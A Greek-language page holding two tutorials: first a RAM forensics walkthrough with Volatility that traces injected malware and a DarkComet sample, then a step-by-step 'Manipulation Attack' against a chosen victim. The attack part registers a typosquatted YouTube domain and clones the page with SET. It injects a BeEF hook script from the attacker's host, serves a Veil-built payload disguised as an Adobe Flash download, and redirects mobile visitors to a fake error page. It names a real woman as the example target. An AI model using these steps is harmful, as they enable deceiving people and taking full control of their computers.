Πως κανουμε ερευνα ηλεκτρονικης εγκληματολογιας στην μνημη RAM

Τι θα χρειαστειτε;

1.Kali Linux
2.DumpIt
3.Windows

Η μνημη τυχαιας προσπελασης(Random Access Memory) ειναι με λιγα λογια η προσωρινη μνημη που χρησιμοποιει ο υπολογιστης για να αποθηκευσει προσωρινα δεδομενα

Εμεις σε αυτον τον οδηγο θα μαθουμε πως κανουμε dump την RAM και πως κοιταμε για ιους με το volatility

Στα windows

Για να αποθηκευσετε(dump) την RAM κατεβαζετε το DumpIt απο εδω

οταν το κατεβασετε το αποσυμπιεζετε και θα δειτε το εκτελεσιμο αρχειο

το εκτελειτε

μας ανοιγει το τερματικο και επιλεγουμε y

οταν μας γραψει success το κλεινουμε και θα δουμε στην επιφανεια εργασιας η στην διαδρομη που το εκτελεσαμε το αρχειο.raw

πχ

το βαζουμε σε ενα usb stick και το μεταφερουμε στα kali
(αν θελετε υπαρχει εκδοση του volatility για windows πατηστε εδω)

οταν εχουμε μεταφερει το αρχειο.raw στα kali πριν ξεκινησουμε το volatility

γραφουμε apt-get install volatility

και μας κανει εγκατασταση την εκδοση 2.4 η οποια μπορει να διαβασει την RAM και στα windows 8.1

τωρα οταν τελειωσει η εγκατασταση γραφουμε


volatility -f /root/Desktop/arxeio.raw imageinfo

οπου
imageinfo μας αναγνωριζει απο τι λειτουργικο εχει γινει το dump της RAM
-f η διαδρομη του αρχειου.raw

*θα κανει αρκετη ωρα  αν ξερετε τι λειτουργικο ειναι απλα βαζετε το προφιλ


θα χρησιμοποιησουμε σαν προφιλ Win8SP1x64
για να μην γραφετε συνεχεια το προφιλ και την τοποθεσια μπορειτε να γραψετε τις εντολες
export VOLATILITY_PROFILE=Win8SP1x6
export VOLATILITY_LOCATION=file:///root/Desktop/arxeio.raw
*Αν ανοιξετε αλλο τερματικο τοτε πρεπει να τις ξαναγραψετε
*για να δειτε ολες τις εντολες που υποστηριζει το volatility για το συγκεκριμενο προφιλ θα γραψετε την εντολη
volatility --profile=Win8SP1x64 -f /root/Desktop/arxeio.raw -h

οποτε τωρα το πρωτο πραγμα που θα κανουμε  ειναι να δουμε, τι διεργασιες ετρεχε το λειτουργικο συστημα οταν εγινε το dump


volatility --profile=Win8SP1x64 -f /root/Desktop/arxeio.raw pslist

γενικα ενα προγραμμα οταν εκτελειτε γινετε διεργασια
απο τον πινακα τα βασικα που πρεπει να γνωριζετε ειναι
Offset (v) ειναι ο εικονικος χωρος θεσεως της διεργασιας
PID (Process Identity) ο αριθμος ταυτοτητα της διεργασιας
PPID (Parent Process Identity) ο αριθμος ταυτοτητας γoνικης διεργασιας
Thds (Threads) νηματα σε μια διεργασια (μικρη ακολουθια εντολων σε μια διεργασια)
Start ωρα εκιννηση της διεργασιας
Exit ωρα τερματισμος της διεργασιας

πχ
την διεργασια system με pid 4 και ppid 0 προφανως δεν θα εχει γονεα αυτη η διεργασια γιατι ειναι η αρχικη του συστηματος
αλλα βλεπετε οτι η διεργασια smss.exe εχει γονεα το system

τωρα εφοσον εχουμε καταλαβει τι ειναι pid και ppid κοιταμε για περιεργα ονοματα στις διεργασιες

εδω βλεπουμε οτι υπαρχει μια διεργασια rubyw.exe η οποια εχει τερματιστει

βλεπουμε οτι εχει αρ.ταυτοτητας (PID) 5280 και οτι ο γονεας της ειναι (PPID) 3868
οποτε προσπαθουμε να βρουμε τον γονεα της δλδ την διεργασια με PID 3868
 η εντολη pstree θα μας βοηθησει ποιο ευκολα να την βρουμε

 volatility --profile=Win8SP1x64 -f /root/Desktop/arxeio.raw pstree

 και

επισης μπορειτε να το δειτε σε γραφικη μορφη

volatility --profile=Win8SP1x64 -f /root/Desktop/arxeio.raw psscan --output=dot --output-file=diergasies.dot

και για να δειτε το γραφημα
γραφουμε display diergasies.dot

και κοιταμε για την διεργασια rubyw.exe

oπως βλεπετε δεν μπορουμε να δουμε ποια διεργασια ειναι ο γονεας

δοκιμαζουμε την εντολη psxview για να δουμε αν υπαρχει καποια κρυφη διεργασια

volatility --profile=Win8SP1x64 -f /root/Desktop/arxeio.raw psxview

(* στην στηλη pslist αν υπαρχει false τοτε μια διεργασια ειναι κρυφη)

και δεν βλεπουμε τιποτα

κοιταμε για ενεργες συνδεσεις με την εντολη netscan

και βλεπουμε την διεργασια rubyw.exe ,παρολο που στις διεργασιες ελεγε οτι εχει τερματιστει υπαρχει ενεργη συνδεση με την ip 192.168.1.20 στην θυρα 8888

καταλαβαινουμε οτι  σε καποια αλλη διεργασια εχει γινει inject ,
για να το βρουμε αυτο θα τρεξουμε την εντολη malfind και θα αποθηκευσουμε το dump σε ενα φακελο

volatility --profile=Win8SP1x64 -f /root/Desktop/arxeio.raw malfind -D /root/Desktop/malfind/

ψαχνουμε να βρουμε στο hexidecimal (4D 5A) και MZ header το οποιο δηλωνει οτι ειναι εκτελεσιμο αρχειο MS-DOS (πηρε το ονομα απο Mark Zbikowski, ενας απο τους ιδρυτες του MS-DOS)
(Το malfind μπορει να σας βγαλει και λανθασμενα αποτελεσματα γιατι μερικες διεργαισες περιεχουν PAGE_EXECUTE_READWRITE αυτο σημενει οτι μεσα στην διεργασια μπορει να γραφτει κωδικας και να εκτελεστει)

 και βλεπουμε οτι στην διεργασια explorer εχει γινει inject

πηγαινουμε στην διαδρομη
γραφετε ls -lS

βλεπουμε ποσα bytes εχουν γινει inject και την εικονικη θεση χωρου της διεργασιας explorer.exe

μπορουμε να εξαγουμε την διεργασια και να εφαρμοσουμε αντιστροφη μηχανικη

για να κερδισουμε χρονο ομως
το ανεβαζουμε στο virus total
βλεπουμε οτι το εχoυν εντοπισει 5 απο τα 57 antivirus

εδω βλεπουμε ποια antivirus το εχουνε εντοπισει

γενικα να γνωριζετε οτι καθε ιος ειναι διαφορετικος
αλλα ολοι εχουνε  2 κοινα χαρακτηριστικα
να μενουν κρυμενοι και να τρεχουν μονιμα στο συστημα

εμεις ειδαμε τον ιο να ειναι κρυμενος στην διεργασια explorer.exe
τωρα μας μενει να βρουμε τον τροπο που μενει μονιμα στο συστημα(persistance)
οταν λεμε ενας ιος μενει μονιμα στο συστημα εννοουμε τον τροπο που ο ιος τρεχει καθε φορα που ξεκιναμε τον υπολογιστη μας
ολοι σχεδον οι ιοι η θα βρισκονται στη διαδρομη startup η θα εχουνε αλλη διαδρομη και θα ειναι γραμμενοι στην registry πχ
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
μπορει να ξεκινανε και σαν υπηρεσια κτλ

αρχικα θα κοιταξουμε με την εντολη filescan
γενικα αυτη η εντολη σας λεει τι αρχεια εχουν χρησιμοποιηθει οταν εγινε το dump της μνημης RAM
εμεις θα δουμε τι υπαρχει στην διαδρομη startup

volatility --profile=Win8SP1x64 -f /root/Desktop/arxeio.raw filescan -V | grep "Startup"

και βλεπουμε οτι υπαρχει το εκτελεσιμο αρχειο win32.exe στην διαδρομη του Startup
*οτι εκτελεσιμο αρχειο υπαρχει σε αυτη την διαδρομη με το που ξεκινησει το συστημα σας τοτε εκτελειτε αυτοματα
 
Αυτος ο οδηγος ειναι βασικος ωστε να δειτε πως μπορειτε να βρειτε στην ουσια μια μολυσμενη διεργασια .ο ιος εγινε inject στην διεργασια explorer.exe και μετα το αρχικο αρχειο του ιου τερματιστηκε αλλα παρεμεινε στον υπολογιστη για να ξανατρεξει

Υπο κανονικες συνθηκες ενας χρηστης με απλες γνωσεις θα μπορουσε να δει μια υποπτη διεργασια αλλα με αυτο τον τροπο μολυνσεις δεν θα μπορουσε ποτε να δει την διεργασια (rubyw.exe) καθως δεν θα εμφανιζετε στην διαχειριση εργασιων (Task Manager)

Για παραδειγμα θα αναλυσουμε τον ιο Dark comet σε Windows 7
το δειγμα μπορειτε να το βρειτε εδω

το κατεβαζουμε και το αποσυμπιεζουμε
*WIN-TTUMF6EI3O3-20140203-123134.raw εγω το ονομασα dark.raw

οποτε τωρα τρεχουμε αρχικα την εντολη imageinfo

 

τωρα βλεπουμε τις διεργασιες με την εντολη pslist

 και

με μια ματια δεν βλεπουμε κατι περιεργο αλλα ας δουμε αν υπαρχει συνδεση με την εντολη netstat

βλεπουμε 2 συνδεσεις η πρωτη ειναι Syn_sent δλδ μισανοικτη (half-open)αυτο γινεται συνηθως οταν εχει γινει η συνδεση και απο την αλλη μερια εχει κλεισει και δεν εχει ειδοποιηση αυτον που ακουει με αποτελεσμα να μενει μισανοικτη η απο την αλλη μερια ειναι αδρανης ,παρατηρουμε και την θυρα 1604 η οποια ειναι η κλασικη θυρα που χρησιμοποιει το Dark Comet αλλα δεν βλεπουμε την διεργασια

εφοσον τωρα ειμαστε σιγουροι οτι υπαρχει ιος κοιταμε καλυτερα τις διεργασιες
θα προσπαθησουμε να κοιταξουμε τον γονικη σχεση τον δεργασιων με την εντολη pstree

βλεπουμε οτι η διεργασια runddl32.exe ειναι γονεας της διεργασια notapad.exe
η διεργασια notepad.exe δημιουργειτε οταν εκτελουμε το προγραμμα επεξεργασιας κειμενου(notepad) και ξερουμε οτι γονεα εχει παντα την διεργασια explorer.exe  η εστω την διεργασια cmd.exe που αυτη η διεργασια εχει γονεα την διεργασια explorer.exe
για να το καταλαβετε καλυτερα πχ εγω θελω να γραψω σε ενα αρχειο κειμενου
ανοιγω το notepad και γραφω,η διεργασια του notepad θα εχει σαν pid 1343 και ppid 789 ,η διεργασια explorer.exe θα εχει pid 789
τωρα αν ειμαι απο το τερματικο των windows και θελω να ανοιξω το notepad
το notepad θα εχει γονεα την διεργασια cmd.exe και η διεργασια cmd θα εχει γονεα την διεργασια explorer.exe και αυτο γινεται γιατι πολυ απλα η διεργασια explorer.exe μου επιτρεπει γενικα τον χειρισμο των windows

οποτε η υποπτη διεργασια ειναι η runddl32.exe

οποτε τωρα θα εξαγουμε την διεργασια με την εντολη procdump

και ανεβαζουμε στο virus total

και εδω βλεπουμε οτι ειναι Dark comet

ενας ενναλακτικος τροπος για να βρουμε την διεργασια εφοσον ξερουμε τον ιο
ειναι η εντολη yarascan
αυτη η εντολη κοιταει μεσα στις διεργασιες πχ

η πχ εφοσον ξερουμε την θυρα

για να βρουμε την διαδρομη του εκτελεσιμου θα χρησιμοποιησουμε την εντολη cmdline

για να δουμε αν εχει γραφτει στην registry(μητρωα των windows)
θα χρησιμοποιησουμε την εντολη printkey

σε αυτο το δειγμα εχω κανει ποιο απλη αναλυση της Ram και στην ευρεση τoυ ιου ωστε να καταλαβετε
για να δειτε μια ποιο προχωρημενη αναλυση τοτε κοταξτε εδω

Γενικα η ηλεκτρονικη εγκληματολογια ειναι ενας κλαδος πολυ καλος οσοι θελουνε να ασχοληθουνε ας κοιταξουν εδω ,θα βρειτε ολα τα παραδειγματα των εντολων,δειγματα απο RAM απο διαφορα μολυσμενα λειτουργικα  επισης θα σας βοηθησει παρα πολυ αν διαβασετε εδω

Πως εισβαλουμε στον υπολογιστη ενος στοχευμενου χρηστη(Manipulation Attack)

Τι θα χρειαστειτε;

1.Kali Linux
2.Λογαριασμο στο youtube
3.Firebug

Το σημαντικοτερο σε αυτη την επιθεση ειναι οι πληροφοριες που εχουμε για το θυμα μας και στο ποσο καλοι ειμαστε στην χειραγωγιση


Για να μαζεψουμε πληροφοριες κανουμε αναζητηση στο διαδικτυο ,κοιταμε προφιλ κοινωνικων δικτυων κτλ

Οταν εχουμε μαζεψει πληροφοριες σκεφτομαστε τον δολο και πως θα χειραγωγισουμε το θυμα
Οταν το σκεφτουμε.....ερχομαστε στην επιθεση

Παταμε εδω

φτιαχνουμε εναν λογαριασμο και επιλεγουμε Δωρεαν

θα σας εμφανιστει αυτη η επιλογη ωστε να βαλετε ενα ονομα στο (sub)domain σας

επειδη η επιθεση θα βασιστει στο youtube θελουμε να δουμε τι διαθεσιμο υπαρχει απο ολα αυτα τα subdomains που μας δινει το hostinger
Για να το δουμε αυτο θα χρησιμoποιησουμε το urlcrazy για να βρουμε αν υπαρχει κατι διαθεσιμο πχ στο subdomain wc.lt
*μπορειτε να παρακαμψετε αυτο το βημα και να βαλετε οτι θελετε 

οποτε γραφουμε σε ενα τερματικο

urlcrazy youtube.wc.lt

το urcrazy  θα κανει αναγραματισμους και μετα θα βρει αν υπαρχουν αυτα τα domain
αν βρειτε καποιο το οποιο δεν υπαρχει τοτε καταχωρηστε το

παταμε ctr+shift+f και κανουμε αναζητηση να μας βρει την καταληξη wc.lt
και βλεπουμε ποιο ειναι διαθεσιμο

 πχ εγω βρηκα το youtbe.wc.lt


οποτε το κατοχυρωνω και μετα παταω διαχειριση

κατω κατω στις επιλογες Προχωρημενο επιλεγουμε Μετατροπεας DNS ζωνης

γραφουμε σε ενα τερματικο

curl ifconfig.me

 σημειωνουμε την εξωτερικη μας ip

πηγαινουμε αλλαζουμε το A record με την εξωτερικη μας ip και  αποθηκευουμε

προωθουμε την θυρα 80 ,9999 και 3000 στο router μας
*Αν δεν ξερετε πως τοτε παταμε εδω επιλεγουμε το μοντελο του router μας και ακολουθουμε τις οδηγιες

τωρα πηγαινουμε στο youtube ,κανουμε εγγραφη η συνδεση και επιλεγουμε μεταφορτωση

επιλεγουμε προβολη διαφανειων φωτογραφιων

επιλεγουμε να ανεβασουμε φωτογραφιες απο τον υπολογιστη μας

κατεβαζουμε απο το προφιλ του θυματος φωτογραφιες και τις ανεβαζουμε

πχ ας υποθεσουμε οτι το θυμα μου ειναι η Adeanna Cooke μια απο τις ποιο ομορφες hacker στον κοσμο

οποτε κατεβαζω απο το προφιλ της και ανεβαζουμε τις φωτογραφιες στο youtube αν θελετε μπορειτε να τις επεξεργαστειτε
πχ

*για επεξεργασια φωτογραφιων υπαρχει το Gimp οποτε με apt-get install gimp το κανετε εγκατασταση η παταμε εδω για online επεξεργασια
οπως και να εχει αυτο το κομματι πως θα φτιαξετε το βιντεο και τι φωτογραφιες θα ανεβασετε βασιζετε σε εσας

οποτε συνεχιζουμε στο ανεβασμα φωτογραφιων

επιλεγουμε καποιο τραγουδι η συνομιλια που θελουμε να εχει το βιντεο με τις φωτογραφιες και κατω κατω επιλεγουμε upload

τελος επιλεγουμε την εικονα σαν εμφανιση στο βιντεο μας,βαζουμε μια επικεφαλιδα ,περιγραφη , περιμενουμε να ανεβει και επιλεγουμε publish

θα μας εμφανισει οτι το βιντεο μας εχει δημοσιευθει στον ταδε συνδεσμο ,εμεις κανουμε αντιγραφη αυτου του συνδεσμου

ανοιγουμε ενα τερματικο και γραφουμε setoolkit

επιλεγουμε 1,2,3,2

εκει που λεει  IP address for the POST back in Harvester/Tabnabbing:
δεν βαζουμε τιποτα και ποιο κατω τον συνδεσμο που μολις αντιγραψαμε
μετα επιλεγουμε y για να ξεκινησει το apache

τωρα αν γραψουμε στην url 127.0.0.1 η την τοπικη μας ip τοτε θα μας εμφανισει την αντεγραμενη σελιδα

οπως ειδατε τα γραμματα δεν μπορουν να διαβαστουν για να το διορθωσουμε αυτο γραφουμε στο τερματικο

leafpad /var/www/index.html

και προσθετουμε μετα το <head>
<meta charset=UTF-8>

αποθηκευουμε και κλεινουμε

αν γραψουμε παλι στην url 127.0.0.1 θα δουμε οτι μας τα εμφανιζει κανονικα

τωρα εφοσον εχουμε φτιαξει τον δολο μας μενει να φτιαξουμε και την επιθεση

γραφουμε στο τερματικο

leafpad /var/www/index.html

προσθετουμε αυτη την γραμμη

<script type=text/javascript src=http://youtbe.wc.lt:3000/hook.js></script>
 και αποθηκευουμε

οπου youtbe.wc.lt βαζετε το domain που εχετε φτιαξει εσεις

τωρα χρειαζομαστε το firebug

παταμε εδω ωστε να κανουμε εγκατασταση του firebug
επιλεγουμε add to firefox

επιλεγουμε install

και οταν γινει εγκατασταση τοτε θα δουμε ενα σκαθαρι πανω δεξια

το firebug σας επιτρεπει να βλεπετε και να αλλαζετε τον κωδικα της σελιδας εμεις θα το χρησιμοποιησουμε ωστε να φτιαξουμε την σελιδα

οποτε γραφουμε στην url και 127.0.0.1

με δεξι κλικ στο  πλαισιο επιλεγουμε Inspect Element with Firebug

επιλεγουμε οπως στην κατω εικονα και με το πληκτρο delete διαγραφουμε

τωρα εφοσον εφυγε το πλαισιο που ελεγε για την επιλογη γλωσσας τοτε επιλεγουμε πανω πανω που λεει html class και με δεξι κλικ επιλεγουμε copy html

γραφουμε σε ενα τερματικο

leafpad /var/www/adobe.html

και κανουμε επικολληση του κωδικα html που αντιγραψαμε

αποθηκευουμε

τωρα γραφουμε στην url 127.0.0.1/adobe.html

και βλεπουμε

γραφουμε παλι στο τερματικο

leafpad /var/www/adobe.html

παταμε ctrl+H και στην πανω γραμμη Find what γραφουμε
http:\/\/get.adobe.com\/flashplayer\/\
στην κατω γραμμη Replace with γραφουμε http://youtbe.wc.lt/adobe.exe

 αποθηκευουμε

τωρα μας μενει να βγαλουμε τον ιο οποτε θα χρειαστουμε το Veil
*αν δεν το εχετε εγκατεστημενο τοτε κοιταξτε σε παλιοτερους οδηγους*

γραφουμε σε ενα τερματικο
cd /Veil/Veil-Evasion
και ./Veil-Evasion

επιλεγουμε οτι payload θελουμε βαζουμε την εξωτερικη μας ip (η domain), και θυρα

γραφουμε generate
και το ονομα  adobe

μετα το αρχειο adobe.exe το μεταφερουμε στη διαδρομη /var/www/
με την εντολη
mv /veil-output/compiled/adobe.exe /var/www/

οποτε τωρα ειμαστε ετοιμοι

γραφουμε στην url το domain μας και βλεπουμε αν μας εμφανιζετε

πχ

αν δεν σας εχει εμφανιστει τοτε δεν εχετε προωθησει την θυρα 80 η δεν εχει μεταφερθει ακομα το A record

για να δειτε αν εχει μεταφερθει το A record γραψτε στο τερματικο

ping youtbe.wc.lt -c 2

αν δουμε την εξωτερικη μας  ip τοτε ειμαστε ενταξει οποτε πρεπει να κοιταξουμε τις ρυθμισεις στο router μας

Τωρα ξεκιναμε το BeEF και το Armitage *(κοιταξτε σε παλιοτερους οδηγους πως)

Στο Armitage ξεκιναμε να ακουει στην θυρα 9999

 και

Ξεκιναμε το BeEF (για νεοτερη εκδοση του BeEF κοιταξτε εδω)

Τελικο βημα μας μενει να στειλουμε στο θυμα μας την σελιδα που φτιαξαμε δλδ το http://youtbe.wc.lt

για να το κανουμε ποιο πηστικο γραφουμε
http://youtbe.wc.lt/?www.youtube.com/watch=fad33vwe
η
http://youtbe.wc.lt/?watch=njxdfw32

οτι βαλουμε μετα το /? δεν το πιανει οποτε γραφετε οτι θελετε εσεις

πριν το στειλουμε πηγαινουμε εδω για να κανουμε debug του συνδεσμου

και κατω κατω βλεπουμε πως θα εμφανιστει στο facebook

οποτε τωρα στελνουμε τον συνδεσμο στο θυμα μας μεσω συνομιλιας
πχ μεθοδος κινεζου "ρε συ εσυ δεν εισαι αυτη?"

οταν το θυμα πατησει τον συνδεσμο θα παει στην σελιδα μας και θα τον δουμε στο BeEF σαν zombie

επιλεγουμε πανω στο θυμα ,commands ,γραφουμε στο search redirect
επιλεγουμε Redirect Browser η Riderect Browser (iframe)  και γραφουμε στο Redirect url http://youtbe.wc.lt/adobe ωστε να τον παει στην σελιδα για να κανει ληψη του ιου

στο θυμα θα  εμφανιστει αυτο

 οταν το θυμα κατεβασει και τρεξει τον ιο τοτε θα τον δουμε σαν slave στο Armitage

τωρα εχουμε τον πληρη ελενχο του υπολογιστη του
 (δειτε σε παλιοτερους οδηγους πως θα κανετα persist)


Τι γινεται ομως αν το θυμα ειναι απο κινητο η tablet?

πολυ απλα θα ρυθμισουμε τον apache server μας να ανακατευθυνει

γραφουμε σε ενα τερματικο

a2enmod rewrite

service apache2 restart

μετα cd /etc/apache2/sites-enabled
ls

μετα nano 000-default και αλλαζουμε τo None σε All

αποθηκευουμε
και με την εντολη service apache2 restart κανουμε παλι επανεκκινηση του apache

γραφουμε

leafpad /var/www/.htaccess

και βαζουμε μεσα στο αρχειο

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|googlebot-mobile|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos" [NC]
RewriteRule ^$ http://youtbe.wc.lt/error [L,R=302]
</IfModule>

οπου http://youtbe.wc.lt/ βαζετε το domain που φτιαξατε

τωρα μας μενει να φτιαξουμε το αρχειο error.html

γραφουμε leafpad /var/www/error.html

και βαζουμε μεσα

<head>
<span style="font-size: 35px;"><b>Λόγω αναβάθμισης η συσκευή σας δεν υποστηρίζετε προσωρινά</b></span><br />
<span style="font-size: 35px;"><b>Παρακαλώ συνδεθείτε απο ένα σταθερό υπολογιστή</b></span></div>
<script type=text/javascript src=http://youtbe.wc.lt:3000/hook.js></script>
</head>

μην ξεχασετε να αλλαξετε το domain σας στο script του BeEF
*μπορειτε να παρετε πληροφοριες απο το κιν του θυματος οπως ip ,τοποθεσια,κωδικους κτλ *κοιταξτε παλιοτερο οδηγο με BeEF*

αποθηκευουμε και για αλλη μια φορα κανουμε επανεκκινηση του apache
service apache2 restart

οταν το θυμα πατησει στον συνδεσμο απο κινητο τοτε θα ανακατευθυνθει εδω

Με αυτο τον τροπο το θυμα θα παει κατευθειαν στην σελιδα error με αποτελεσμα να μην δει το βιντεο και να αναγκαστει να μπει απο τον υπολογιστη του

*Σημαντικο ειναι να γνωριζετε οτι μια επιθεση δεν πρεπει να την εφαρμοζετε πανω απο 1 φορα ,αν αποτυχει η επιθεση δοκιμαστε με αλλο τροπο ,δολο κτλ

* Μπορειτε να κανετε παρα πολλες παραλλαγες αυτης της επιθεσης
εγω σας εδειξα απλα μια μεθοδο γιαυτο την ονομασα Manipulation Attack
δλδ αυτη η επιθεση βασιζετε στην ικανοτητα να χειραγωγισετε το θυμα 
*οταν εχετε παρει προσβαση στον υπολογιστη του θυματος καλο θα ητανε να σβησετε το βιντεο

Πως θα προστατευτειτε;

1.Παντα να κοιτατε τους συνδεσμους
2.Ποτε μην κατεβαζετε αρχεια απο αγνωστες σελιδες
3.Μην στηριζεστε στο antivirus που εχετε
4.Περιοριστε τα προσωπικα σας δεδομενα στο διαδικτυο 
5.Περιοριστε τους φιλους σας στα κοινωνικα δικτυα